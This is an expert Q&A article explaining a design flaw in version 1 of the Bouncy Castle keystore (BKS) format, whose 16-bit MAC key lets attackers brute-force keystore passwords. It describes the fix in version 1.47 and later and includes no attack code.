Bouncy Castle is a collection of cryptographic APIs for Java and C#, but it was recently reported that some of...
the Bouncy Castle keystore files are vulnerable to hash collisions, which enable attackers to use brute force attacks to crack the cryptography behind C# and Java applications. How is this possible? What solutions has Bouncy Castle suggested?
Brute force cracking of the cryptography for C# and Java applications may be caused by a design flaw in the first version of the Bouncy Castle keystore (BKS) file of encryption keys. The flaw improperly determines the message authentication code (MAC) key size used to protect the data inside of the keystore where the key size is insufficient to prevent a hash collision attack against valid passwords.
In the BKS hashed MAC, an SHA-1 cryptographic hash function is 160 bits long. RFC 7292 on cryptographic algorithms specifies that the sizes of the MAC key and the hash function must be the same. The first version of the Bouncy Castle keystore files fails to meet this requirement if the MAC key size is 16 bits instead of the required 160 bits.
A 16-bit BKS file can have a repository of 65,536 different encryption keys -- meaning an attacker could write a simple password to crack the script to the brute force hash collisions. Furthermore, as computational power increases, attackers may find it easier to guess key values in seconds.
A CERT Coordination Center blogger at Carnegie Mellon University demonstrated how he created a brute force cracking tool with Python's pyjks library and saved the script as a Python file (crackbks.py). Upon execution, the file showed the password in plain view and the maximum size of the Bouncy Castle keystore password was found to be 16 bits.
Bouncy Castle has suggested using BKS version 1.47 or newer, as the default MAC key size of a BKS keystore file was increased from 16 bits to 160 bits to protect the keystore from hash collision attacks.
Ask the expert:
Want to ask Judith Myerson a question about security? Submit your question now via email. (All questions are anonymous.)
Dig Deeper on Alternative operating system security
Related Q&A from Judith Myerson
Air-gapped computers subject to PowerHammer attack: Proof-of-concept attack enables data exfiltration through control of current flow over power ... Continue Reading
Bastille researchers created the SirenJack proof of concept to show how a vulnerability could put San Francisco's emergency warning system at risk. ... Continue Reading
A QR code vulnerability was recently discovered in the Apple iOS 11 camera app. Learn how an attacker could exploit it and how to avoid the issue ... Continue Reading
Have a question for an expert?
Please add a title for your question
Get answers from a TechTarget expert on whatever's puzzling you.